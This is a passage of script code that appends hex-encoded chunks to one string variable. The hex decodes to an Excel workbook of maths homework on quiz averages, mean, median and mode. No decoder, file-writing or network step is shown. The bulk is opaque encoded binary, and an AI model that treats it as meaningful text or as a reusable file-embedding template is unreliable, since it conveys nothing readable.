\nwD+=\"0001a0000009700000034000000261002000d005110080000010000000000000d1014000000\" \nwD+=\"080148006f006d00650077006f0072006b00271006000100000000003410000034100000000\" \nwD+=\"20e00000000000b000000000001000000651002000200040235000000000000001600013100\" \nwD+=\"2f00320039002c00200033003000200050002e0020003400390032002c00200050002000350\" \nwD+=\"03000320004022f0001000000000013000131002f0033003100200032002f00310020004300\" \nwD+=\"68002000540065007300740020004100200004022d0002000000000012000132002f0031002\" \nwD+=\"c003200200070002e00200035003100360020002d0020003500310038000402270003000000\" \nwD+=\"00000f0001700072006f006a0065006300740020006f00750074006c0069006e00650004023\" \nwD+=\"10004000000000014000132002f0036002c0020003700200070002e00200037003900390020\" \nwD+=\"00230031002d003200350020000402290005000000000010000170002e00200035003300310\" \nwD+=\"02000350033003800200032002f0038002c0039000402370006000000000017000139002e00\" \nwD+=\"3300200039002e00340020007000790074006800610067006f007200650061006e002000740\" \nwD+=\"068006d0004022f0007000000000013000132002f00320037002c003200380020004d006100\" \nwD+=\"7400680020004100200074006500730074000402330008000000000015000133002f0031002\" \nwD+=\"c003200200077006b007300680074002000310030002e0031002f00310030002e0036000402\" \nwD+=\"21000900000000000c00016c006f0063007500730020007000610063006b006500740004024\" \nwD+=\"7000a00000000001f000133002f0037002c0038002000310031002e00310020006e006f0074\" \nwD+=\"0065007300200061006e0064002000700072006100630020004100200073006800740065100\" \nwD+=\"200010003020e00000000000000000000000040594003020e000100000000000000000000c0\" \nwD+=\"504003020e000200000000009a99999999d9534003020e00030000000000000000000000594\" \nwD+=\"003020e00040000000000000000000000594003020e00050000000000000000000000000003\" \nwD+=\"020e00060000000000000000000000000003020e00070000000000000000000000594003020\" \nwD+=\"e00080000000000000000000000000003020e00090000000000000000000000594003020e00\" \nwD+=\"0a000000000000000000000059406510020003000a0000003e021200b600030000004000000\" \nwD+=\"000000000000000001d000f00030300030000000100030003000303ef000600050037000000\" \nwD+=\"67081700670800000000000000000000020001ffffffff004000000a0000000908100000061\" \nwD+=\"000e228cd07c9c00000060200000b021800000000000100000025000000d05800004d610000\" \nwD+=\"076200000d00020001000c00020064000f000200010011000200000010000800fca9f1d24d6\" \nwD+=\"2503f5f00020001002a00020000002b00020000008200020001008000080000000000000000\" \nwD+=\"00250204000000ff0081000200c1041400000015000000830002000000840002000000a1002\" \nwD+=\"2000000ff000100010001000400020001ff000000000000e03f000000000000e03f006f5500\" \nwD+=\"020008007d000c0000000000db1f0f00020004007d000c00010001006d0b0f00020004009b0\" \nwD+=\"000009d00020001009e001d00000004000602d85a3601040100000000000000000000000000\" \nwD+=\"7175697a00020e00010000002500000000000900000008021000010000000900ff000000000\" \nwD+=\"000010f0008021000020000000900ff000000000020010f0008021000030000000900ff0000\" \nwD+=\"00000020010f0008021000040000000900ff000000000020010f0008021000050000000900f\" \nwD+=\"f000000000000010f0008021000060000000900ff000000000020010f000802100007000000\" \nwD+=\"0900ff000000000020010f0008021000080000000900ff000000000020010f0008021000090\" \nwD+=\"000000900ff000000000000010f00080210000a0000000900ff000000000020010f00080210\" \nwD+=\"000b0000000900ff000000000000010f00080210000c0000000900ff000000000020010f000\" \nwD+=\"80210000d0000000900ff000000000020010f00080210000e0000000900ff00000000002001\" \nwD+=\"0f00080210000f0000000900ff000000000020010f0008021000100000000300ff000000000\" \nwD+=\"020010f0008021000110000000300ff000000000020010f0008021000120000000300ff0000\" \nwD+=\"00000020010f0008021000130000000300ff000000000020010f0008021000140000000300f\" \nwD+=\"f000000000020010f0008021000150000000300ff000000000020010f000802100016000000\" \nwD+=\"0300ff000000000020010f0008021000170000000300ff000000000020010f0008021000180\" \nwD+=\"000000300ff000000000020010f0008021000190000000300ff000000000020010f00080210\" \nwD+=\"001a0000000300ff000000000020010f00080210001b0000000300ff000000000020010f000\" \nwD+=\"80210001c0000000300ff000000000020010f00080210001d0000000300ff00000000000001\" \nwD+=\"0f00080210001e0000000300ff000000000020010f00080210001f0000000300ff000000000\" \nwD+=\"020010f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a0001\" \nwD+=\"0002000f0002000000fd000a00010003000f0047000000fd000a00010004000f0032000000f\" \nwD+=\"d000a00010005000f0048000000fd000a00010006000f004d000000fd000a00010007000f00\" \nwD+=\"4e000000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a00020\" \nwD+=\"001000f00220000007e020a00020002000f0000005940fd000a00030000000f0003000000fd\" \nwD+=\"000a00030001000f00090000007e020a00030002000f0000005940fd000a00040000000f000\" \nwD+=\"4000000fd000a00040001000f000a0000007e020a00040002000f0000005940fd000a000500\" \nwD+=\"00000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940060\" \nwD+=\"02e00050003000f000000000000e050400000b80b37fc180024050002c024090002c0240b00\" \nwD+=\"02c0241d0002c042040500fd000a00060000000f0006000000fd000a00060001000f0009000\" \nwD+=\"0007e020a00060002000f0000c0504003020e0006000700170014b742712b145140fd000a00\" \nwD+=\"070000000f0007000000fd000a00070001000f00090000007e020a00070002000f000000444\" \nwD+=\"0fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002000f\" \nwD+=\"0000004940fd000a00090000000f000d000000fd000a00090001000f000b0000007e020a000\" \nwD+=\"90002000f0000005440fd000a000a0000000f000e000000fd000a000a0001000f000c000000\" \nwD+=\"7e020a000a0002000f0000805140fd000a000b0000000f0011000000fd000a000b0001000f0\" \nwD+=\"00b0000007e020a000b0002000f0000005940fd000a000c0000000f000f000000fd000a000c\" \nwD+=\"0001000f00090000007e020a000c0002000f0000005940fd000a000d0000000f0023000000f\" \nwD+=\"d000a000d0001000f000a0000007e020a000d0002000f0000003440fd000a000e0000000f00\" \nwD+=\"10000000fd000a000e0001000f000a0000007e020a000e0002000f0000004940fd000a000f0\" \nwD+=\"000000f0012000000fd000a000f0001000f000a0000007e020a000f0002000f0000004940fd\" \nwD+=\"000a00100000000f0013000000fd000a00100001000f000a0000007e020a00100002000f000\" \nwD+=\"0003440fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a001100\" \nwD+=\"02000f0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e0\" \nwD+=\"20a00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009\" \nwD+=\"0000007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000\" \nwD+=\"1000f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd00\" \nwD+=\"0a00150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190\" \nwD+=\"00000fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000\" \nwD+=\"000f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000\" \nwD+=\"a00180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000\" \nwD+=\"0000fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900020\" \nwD+=\"00f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a\" \nwD+=\"001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000\" \nwD+=\"0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100\" \nwD+=\"0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0\" \nwD+=\"01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000\" \nwD+=\"00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000\" \nwD+=\"f001e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d7004200\" \nwD+=\"1a08000058027e002a002a002a005c003c002a002a002a002a002a002a002a002a002a002a0\" \nwD+=\"02a002a002a002a002a002a002a002a002a002a002a002a002a002a00080210002200000007\" \nwD+=\"00ff000000000000010f0008021000230000000700ff000000000000010f000802100024000\" \nwD+=\"0000700ff000000000000010f00fd000a00220002000f0037000000fd000a00220006000f00\" \nwD+=\"2a0000007e020a00230006000f0000003440fd000a0024000000210038000000d7000a00740\" \nwD+=\"0000028001c000e00c2010c00030005000300090303003800ec00aa000f0002f03a01000040\" \nwD+=\"0008f00800000003000000020c00000f0003f00a0100000f0004f028000000010009f010000\" \nwD+=\"0000000000000000000000000000000000002000af008000000000c0000050000000f0004f0\" \nwD+=\"52000000920c0af008000000010c0000000a000043000bf0180000007f0004010401bf00080\" \nwD+=\"00800ff0100000800bf0300000200000010f012000000010001000000010000000200000002\" \nwD+=\"000000000011f0000000005d0046001500120014000100012100000000441d9201000000000\" \nwD+=\"c00140000000000000000000000010008000000100000001300ee1f00000800070001030000\" \nwD+=\"0a001400570000000000ec0078000f0004f078000000f2030af008000000020c0000000a000\" \nwD+=\"093000bf0360000008000a86e36018500010000008b0002000000bf0008000a004701ae5900\" \nwD+=\"004801cffaffff810141000008c001400000087f0300000c00000010f012000000000000005\" \nwD+=\"2032300d300020090022700a600000011f0000000005d001a00150012001e0002001160a86e\" \nwD+=\"3601a01d92010000000000000000ec00080000000df000000000b6011200120200000000000\" \nwD+=\"0000022001000000000003c00230000496e73657274207765696768746564207175697a2061\" \nwD+=\"76657261676520686572652e3c00100000001100c400110022000000ac9c3400ec0018001f0\" \nwD+=\"005f010000000000017f00800000002000000020c00003e021200b600000000004000000000\" \nwD+=\"000000000000001d000f00032700050000000100270027000505ef0006000500370000000a0\" \nwD+=\"000000908100000061000e228cd07c9c00000060200000b0218000000000001000000270000\" \nwD+=\"0027650000896d00005f6e00000d00020001000c00020064000f00020001001100020000001\" \nwD+=\"0000800fca9f1d24d62503f5f00020001002a00020000002b00020000008200020001008000\" \nwD+=\"08000000000000000000250204000000ff0081000200c104140000001500000083000200000\" \nwD+=\"0840002000000a10022000000ff00010001000100040100050505000000000000e03f000000\" \nwD+=\"000000e03f72655500020008007d000c0000000000db1f0f00020004017d000c00010001006\" \nwD+=\"d0b0f00020004019b0000009d00020001009e001d00000004000602046e3601040100000000\" \nwD+=\"0000000000000000007465737400020e0001000000270000000000080000000802100001000\" \nwD+=\"0000800ff000000000000010f0008021000020000000800ff000000000020010f0008021000\" \nwD+=\"030000000800ff000000000020010f0008021000040000000800ff000000000020010f00080\" \nwD+=\"21000050000000800ff000000000020010f0008021000060000000800ff000000000020010f\" \nwD+=\"0008021000070000000800ff000000000020010f0008021000080000000800ff00000000000\" \nwD+=\"0010f0008021000090000000800ff000000000020010f00080210000a0000000800ff000000\" \nwD+=\"000000010f00080210000b0000000800ff000000000020010f00080210000c0000000800ff0\" \nwD+=\"00000000020010f00080210000d0000000800ff000000000020010f00080210000e00000008\" \nwD+=\"00ff000000000020010f00080210000f0000000800ff000000000020010f000802100010000\" \nwD+=\"0000300ff000000000020010f0008021000110000000300ff000000000000010f0008021000\" \nwD+=\"120000000300ff000000000020010f0008021000130000000300ff000000000020010f00080\" \nwD+=\"21000140000000300ff000000000020010f0008021000150000000300ff000000000020010f\" \nwD+=\"0008021000160000000300ff000000000020010f0008021000170000000300ff00000000002\" \nwD+=\"0010f0008021000180000000300ff000000000020010f0008021000190000000300ff000000\" \nwD+=\"000020010f00080210001a0000000300ff000000000000010f00080210001b0000000300ff0\" \nwD+=\"00000000000010f00080210001c0000000300ff000000000020010f00080210001d00000003\" \nwD+=\"00ff000000000020010f00080210001e0000000300ff000000000020010f00080210001f000\" \nwD+=\"0000300ff000000000020010f00fd000a00010000000f0000000000fd000a00010001000f00\" \nwD+=\"01000000fd000a00010002000f0002000000fd000a00010003000f0047000000fd000a00010\" \nwD+=\"004000f004f000000fd000a00010005000f0048000000fd000a00010006000f004d000000fd\" \nwD+=\"000a00010007000f004e000000fd000a00020000000f0021000000fd000a00020001000f002\" \nwD+=\"20000007e020a00020002000f0000005940fd000a00030000000f0003000000fd000a000300\" \nwD+=\"01000f00090000007e020a00030002000f0000005940fd000a00040000000f0004000000fd0\" \nwD+=\"00a00040001000f000a0000007e020a00040002000f0000005940fd000a00050000000f0005\" \nwD+=\"000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd000a0006000\" \nwD+=\"0000f0006000000fd000a00060001000f00090000007e020a00060002000f0000c05040fd00\" \nwD+=\"0a00070000000f0007000000fd000a00070001000f00090000007e020a00070002000f00000\" \nwD+=\"04440fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002\" \nwD+=\"000f000000494006003300080003000f000000000000c051400000f00b37fc1d0024080002c\" \nwD+=\"0240a0002c024110002c0241a0002c0241b0002c042050500fd000a00090000000f000d0000\" \nwD+=\"00fd000a00090001000f000b0000007e020a00090002000f0000005440fd000a000a0000000\" \nwD+=\"f000e000000fd000a000a0001000f000c0000007e020a000a0002000f0000805140fd000a00\" \nwD+=\"0b0000000f0011000000fd000a000b0001000f000b0000007e020a000b0002000f000000594\" \nwD+=\"0fd000a000c0000000f000f000000fd000a000c0001000f00090000007e020a000c0002000f\" \nwD+=\"0000005940fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a000\" \nwD+=\"d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a000000\" \nwD+=\"7e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000f0\" \nwD+=\"00a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a0010\" \nwD+=\"0001000f000a0000007e020a00100002000f0000003440fd000a00110000000f0014000000f\" \nwD+=\"d000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f00\" \nwD+=\"15000000fd000a00120001000f00090000007e020a00120002000f0000005940fd000a00130\" \nwD+=\"000000f0016000000fd000a00130001000f00090000007e020a00130002000f0000000000fd\" \nwD+=\"000a00140000000f0017000000fd000a00140001000f00090000007e020a00140002000f000\" \nwD+=\"0000000fd000a00150000000f0018000000fd000a00150001000f000a0000007e020a001500\" \nwD+=\"02000f0000005940fd000a00160000000f0019000000fd000a00160001000f000a0000007e0\" \nwD+=\"20a00160002000f0000005440fd000a00170000000f001a000000fd000a00170001000f0009\" \nwD+=\"0000007e020a00170002000f0000005940fd000a00180000000f001b000000fd000a0018000\" \nwD+=\"1000f00090000007e020a00180002000f0000000000fd000a00190000000f001c000000fd00\" \nwD+=\"0a00190001000f000a0000007e020a00190002000f0000000000fd000a001a0000000f001d0\" \nwD+=\"00000fd000a001a0001000f000c0000007e020a001a0002000f0000005440fd000a001b0000\" \nwD+=\"000f001d000000fd000a001b0001000f000c0000007e020a001b0002000f0000005440fd000\" \nwD+=\"a001c0000000f001e000000fd000a001c0001000f00090000007e020a001c0002000f000000\" \nwD+=\"5940fd000a001d0000000f001f000000fd000a001d0001000f000b0000007e020a001d00020\" \nwD+=\"00f0000004440fd000a001e0000000f0020000000fd000a001e0001000f00090000007e020a\" \nwD+=\"001e0002000f0000005940fd000a001f0000000f001e000000fd000a001f0001000f000a000\" \nwD+=\"0007e020a001f0002000f0000805640d7004200ff070000580270002a002a002a002a002a00\" \nwD+=\"2a0061002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a002a0\" \nwD+=\"02a002a002a002a002a0008021000220000000300ff000000000000010f0008021000230000\" \nwD+=\"000300ff000000000000010f0008021000260000000300ff000000000000010f00fd000a002\" \nwD+=\"2000000210039000000fd000a00220001000f003a000000fd000a00220002000f002a000000\" \nwD+=\"fd000a00230001000f003b0000007e020a00230002000f0000003440fd000a00260001000f0\" \nwD+=\"046000000d7000a009000000028002a001c00c2010c00050008000400090303004600ec00aa\" \nwD+=\"000f0002f0a2000000500008f00800000002000000011000000f0003f08a0000000f0004f02\" \nwD+=\"8000000010009f0100000000000000000000000000000000000000002000af0080000000010\" \nwD+=\"0000050000000f0004f052000000920c0af00800000001100000000a000043000bf01800000\" \nwD+=\"07f0004010401bf0008000800ff0100000800bf0300000200000010f0120000000100010000\" \nwD+=\"00010000000200000002000000000011f0000000005d0046001500120014000100012100000\" \nwD+=\"0005c229201000000000c00140000000000000000000000010008000000100000001300ee1f\" \nwD+=\"000008000800010300000a0014005700000000003e021200b60000000000400000000000000\" \nwD+=\"0000000001d000f00032600010000000100260026000101ef0006000500370000000a000000\" \nwD+=\"0908100000061000e228cd07c9c00000060200000b021400000000000000000020000000d67\" \nwD+=\"30000d97900000d00020001000c00020064000f000200010011000200000010000800fca9f1\" \nwD+=\"d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000000\" \nwD+=\"0000000250204000000ff0081000200c1041400000015000000830002000000840002000000\" \nwD+=\"4d006a0300004500700073006f006e0020005300740079006c0075007300200043004f004c0\" \nwD+=\"04f005200200036003000300020004500530043002f005000200032000000000001040005dc\" \nwD+=\"008c0243ef800701000100ea0a6f08640001000f006801020001006801020001004c0065007\" \nwD+=\"400740065007200000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000010\" \nwD+=\"000000000000002000000020000000100000030010000000000000000000000000000000000\" \nwD+=\"0044494e55220000003402580053ab1e3f00000000000000000000000001000000000000000\" \nwD+=\"000000000000000080000000100000001000000000002000000040000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"00000580000004f535045414182820200000000000000010000000000000000000000000000\" \nwD+=\"0000000000010000000000000004000000000000000000000000000000000000006a0000000\" \nwD+=\"000000003000000010000000f000000a1002200010064000100010001000200680168010000\" \nwD+=\"00000000e03f000000000000e03f010055000200080000020e0000000000200000000000050\" \nwD+=\"0000008021000000000000500ff000000000000010f0008021000010000000500ff00000000\" \nwD+=\"0000010f0008021000020000000500ff000000000000010f0008021000030000000500ff000\" \nwD+=\"000000000010f0008021000040000000500ff000000000000010f0008021000050000000500\" \nwD+=\"ff000000000000010f0008021000060000000500ff000000000000010f00080210000700000\" \nwD+=\"00500ff000000000000010f0008021000080000000500ff000000000000010f000802100009\" \nwD+=\"0000000500ff000000000000010f00080210000a0000000500ff000000000000010f0008021\" \nwD+=\"0000b0000000500ff000000000000010f00080210000c0000000500ff000000000000010f00\" \nwD+=\"080210000d0000000500ff000000000000010f00080210000e0000000500ff0000000000000\" \nwD+=\"10f00080210000f0000000500ff000000000000010f0008021000100000000200ff00000000\" \nwD+=\"0000010f0008021000110000000200ff000000000000010f0008021000120000000200ff000\" \nwD+=\"000000000010f0008021000130000000200ff000000000000010f0008021000140000000200\" \nwD+=\"ff000000000000010f0008021000150000000200ff000000000000010f00080210001600000\" \nwD+=\"00200ff000000000000010f0008021000170000000200ff000000000000010f000802100018\" \nwD+=\"0000000200ff000000000000010f0008021000190000000200ff000000000000010f0008021\" \nwD+=\"0001a0000000200ff000000000000010f00080210001b0000000200ff000000000000010f00\" \nwD+=\"080210001c0000000200ff000000000000010f00080210001d0000000200ff0000000000000\" \nwD+=\"10f00080210001e0000000200ff000000000000010f00080210001f0000000200ff00000000\" \nwD+=\"0000010f00fd000a00000000000f002e000000fd000a00010000000f002d000000fd000a000\" \nwD+=\"10001000f002c000000fd000a00010003000f0032000000bd001200020000000f000000f03f\" \nwD+=\"0f00000049400100bd001200030000000f00000000400f00000045400100fd000a000300040\" \nwD+=\"00f002f000000bd001200040000000f00000008400f00000000400100060023000400040017\" \nwD+=\"004444444444844b4000002c0c37fd0d002502001f0001c001c042010500bd0012000500000\" \nwD+=\"00f00000010400f0000002a400100bd001200060000000f00000014400f00000050400100bd\" \nwD+=\"001200070000000f00000018400f00000052400100bd001200080000000f0000001c400f000\" \nwD+=\"08056400100fd000a00080004000f0030000000bd001200090000000f00000020400f000000\" \nwD+=\"5440010006002300090004000f0000000000000050400000040004ff0d002502001f0001c00\" \nwD+=\"1c04201e300bd0012000a0000000f00000022400f00000044400100bd0012000b0000000f00\" \nwD+=\"000024400f00008056400100bd0012000c0000000f00000026400f00000039400100bd00120\" \nwD+=\"00d0000000f00000028400f00000041400100fd000a000d0004000f0031000000bd0012000e\" \nwD+=\"0000000f0000002a400f0000c055400100060023000e0004000f00000000000000504000000\" \nwD+=\"90004fe0d006502001f0001c001c042014a01bd0012000f0000000f0000002c400f00004050\" \nwD+=\"400100bd001200100000000f0000002e400f00004053400100bd001200110000000f0000003\" \nwD+=\"0400f00008053400100bd001200120000000f00000031400f00000049400100bd0012001300\" \nwD+=\"00000f00000032400f00000000000100bd001200140000000f00000033400f0000005040010\" \nwD+=\"0bd001200150000000f00000034400f00008047400100bd001200160000000f00000035400f\" \nwD+=\"00000050400100bd001200170000000f00000036400f00000049400100bd001200180000000\" \nwD+=\"f00000037400f00004050400100bd001200190000000f00000038400f00000042400100bd00\" \nwD+=\"12001a0000000f00000039400f0000004c400100bd0012001b0000000f0000003a400f00000\" \nwD+=\"050400100bd0012001c0000000f0000003b400f0000c050400100bd0012001d0000000f0000\" \nwD+=\"003c400f00000037400100bd0012001e0000000f0000003d400f0000c052400100bd0012001\" \nwD+=\"f0000000f0000003e400f00004054400100d7004400eb0500006c020e002a00160024003d00\" \nwD+=\"16001600160024003d0016001600160024003d0016001600160016001600160016001600160\" \nwD+=\"01600160016001600160016001600c2010c0009000e000600090404000000ec00c8000f0002\" \nwD+=\"f036020000600008f00800000005000000051800000f0003f0060200000f0004f0280000000\" \nwD+=\"10009f0100000000000000000000000000000000000000002000af008000000001800000500\" \nwD+=\"00000f0004f078000000f2030af00800000005180000000a000093000bf0360000008000808\" \nwD+=\"d36018500010000008b0002000000bf0008000a004701933900004801e0eeffff8101410000\" \nwD+=\"08c001400000087f0300000c00000010f0120000000000020010020400b5000300600310009\" \nwD+=\"700000011f0000000005d001a00150012001e0005001160808d360158259201000000000000\" \nwD+=\"0000ec00080000000df000000000b6011200120200000000000000003f001000000000003c0\" \nwD+=\"0400000496e73657274206120636f7079206f662074686520646174612066726f6d206c6561\" \nwD+=\"737420746f20677265617465737420696e207468697320636f6c756d6e3c001000000000006\" \nwD+=\"00111003f00000000000000ec006c000f0004f06c000000a20c0af00800000001180000000a\" \nwD+=\"000073000bf02a0000008000d08d36018500010000008b0002000000bf0008000a0081010b0\" \nwD+=\"00008bf0110001000c00140000008000010f0120000000000050020020300e200080000000d\" \nwD+=\"00c400000011f0000000005d001a0015001200060001001160d08d360194269201000000000\" \nwD+=\"0000000ec00080000000df000000000b601120012020000000000000000e500100000000000\" \nwD+=\"3c00e60000416674657220796f752068617665207468652064657369726564206d65616e2c2\" \nwD+=\"06d656469616e20616e64206d6f646520706c65617365206c69737420746865206e756d6265\" \nwD+=\"727320696e206f7264657220746f2070726f766520746f206d6520796f75206861766520617\" \nwD+=\"2726976656420617420746865207269676874206d656469616e2e20204920776f756c642061\" \nwD+=\"6c736f206c696b6520796f7520746f2068696768746c6967687420746865206d6f646520627\" \nwD+=\"920636f6c6f72696e6720696e207468652063656c6c73207468617420636f6e7461696e2074\" \nwD+=\"6865206d6f64652e203c001000000000001b051100e500000000000000ec0066000f0004f06\" \nwD+=\"600000022060af00800000003180000000a000063000bf0240000008000208e36018b000200\" \nwD+=\"0000bf000800080081012e000008bf0110001000c00140000008000010f0120000000000020\" \nwD+=\"0b0020f005a00080070021400b500000011f0000000005d001a00150012001e000300116020\" \nwD+=\"8e3601782792010000000000000000ec00080000000df000000000b60112001202000000000\" \nwD+=\"0000000a1001000000000003c00a20000506c6561736520656e746572206120746578742062\" \nwD+=\"6f782068657265206578706c61696e2074686520737465707320696e766f6c76656420696e2\" \nwD+=\"066696e64696e6720746865206d65616e2c206d656469616e20616e64206d6f64652e202053\" \nwD+=\"6565206d7920646972656374696f6e73206f6e2066696e64696e6720746865206d65616e207\" \nwD+=\"46f2068656c7020796f75207769746820746865206f74686572732e3c00100000000000a603\" \nwD+=\"1100a100000000000000ec006c000f0004f06c000000720b0af00800000004180000000a000\" \nwD+=\"073000bf02a0000008000708e36018500010000008b0002000000bf0008000a0081010d0000\" \nwD+=\"08bf0110001000c00140000008000010f01200000000000200d00313002d000700b00321008\" \nwD+=\"800000011f0000000005d001a00150012001e0004001160708e360154289201000000000000\" \nwD+=\"0000ec00080000000df000000000b6011200120200000000000000005b001000000000003c0\" \nwD+=\"05c0000426f6e757320517565732e0a57726974652074686520737465707320666f72207468\" \nwD+=\"6520656173696573742077617920746f20617272616e67652074686520646174612066726f6\" \nwD+=\"d206c6561737420746f2067726561746573742e3c00100000001000be010f005b0000000000\" \nwD+=\"0000ec0018001f0005f010000000000017f00800000002000000051800003e021200b600000\" \nwD+=\"000004000000000000000000000001d000f00031b000c00000001001b001b000c0cef000600\" \nwD+=\"0500370000000a0000000908100000061000e228cd07c9c00000060200000b0214000000000\" \nwD+=\"0030000000d000000da800000dc8200000d00020001000c00020064000f0002000100110002\" \nwD+=\"00000010000800fca9f1d24d62503f5f00020001002a00020000002b0002000000820002000\" \nwD+=\"100800008000000000000000000250204000000ff0081000200c10414000000150000008300\" \nwD+=\"02000000840002000000a10022000000ff000100010001000401000c0c0c000000000000e03\" \nwD+=\"f000000000000e03f207455000200080000020e00030000000d00000000000b000000080210\" \nwD+=\"00030000000b00ff000000000000010f0008021000040000000b00ff000000000000010f000\" \nwD+=\"8021000050000000b00ff000000000000010f0008021000060000000b00ff00000000000001\" \nwD+=\"0f0008021000070000000b00ff000000000000010f0008021000080000000b00ff000000000\" \nwD+=\"000010f00080210000c0000000b00ff000000000000010f00fd000a00030000000f00510000\" \nwD+=\"00fd000a00030002000f0057000000fd000a00030004000f002f000000fd000a00030005000\" \nwD+=\"f0032000000fd000a00030006000f0031000000fd000a00030007000f005c000000fd000a00\" \nwD+=\"030008000f005d000000fd000a00030009000f005e000000fd000a00040000000f005200000\" \nwD+=\"0fd000a00040002000f0058000000fd000a00050000000f0053000000fd000a00050002000f\" \nwD+=\"0059000000fd000a00060000000f0054000000fd000a00060002000f005a000000fd000a000\" \nwD+=\"70000000f0055000000fd000a00070002000f005b000000fd000a00080000000f0056000000\" \nwD+=\"fd000a000c0002000f0050000000fd000a000c0003000f005f000000fd000a000c0004000f0\" \nwD+=\"060000000fd000a000c0005000f0061000000fd000a000c0006000f0062000000fd000a000c\" \nwD+=\"0007000f0063000000fd000a000c0008000f0064000000fd000a000c000a000f0065000000d\" \nwD+=\"7001200ea010000780070001c001c001c001c000e003e021200b60000000000400000000000\" \nwD+=\"0000000000001d000f00030300020000000100030006000202ef0006000500370000000a000\" \nwD+=\"0000908100000061000e228cd07c9c00000060200000b021400000000000500000007000000\" \nwD+=\"e5830000cd8400000d00020001000c00020064000f000200010011000200000010000800fca\" \nwD+=\"9f1d24d62503f5f00020001002a00020000002b000200000082000200010080000800000000\" \nwD+=\"0000000000250204000000ff0081000200c1041400000015000000830002000000840002000\" \nwD+=\"000a10022000000ff00010001000100040000020202000000000000e03f000000000000e03f\" \nwD+=\"207455000200080000020e00050000000700000002000900000008021000050002000900ff0\" \nwD+=\"00000000000010f0008021000060002000900ff000000000000010f00fd000a00050002000f\" \nwD+=\"003c000000fd000a00050003000f003d000000fd000a00050004000f002b000000fd000a000\" \nwD+=\"50005000f003e000000fd000a00050006000f003d000000fd000a00050007000f003f000000\" \nwD+=\"fd000a00050008000f0040000000fd000a00060002000f0041000000fd000a0006000300220\" \nwD+=\"042000000fd000a00060004000f003d000000fd000a00060005000f0043000000fd000a0006\" \nwD+=\"0006000f0044000000d7000800d0000000140062003e021200b600000000004000000000000\" \nwD+=\"000000000001d000f00030c000500000001000c000c000505ef000600050037000000670817\" \nwD+=\"00670800000000000000000000020001ffffffff004400000a0000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"00000000000000000000000000000000feff000005010200000000000000000000000000000\" \nwD+=\"0000001000000e0859ff2f94f6810ab9108002b27b3d930000000a800000007000000010000\" \nwD+=\"00400000000400000048000000080000006000000012000000700000000c000000880000000\" \nwD+=\"d0000009400000013000000a000000002000000e40400001e000000100000004d6172696520\" \nwD+=\"547265766973616e69001e0000000800000072696477616e00001e000000100000004d69637\" \nwD+=\"26f736f667420457863656c004000000080c44fcb9448c601400000008036c20bc0cacb0103\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" \nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\" 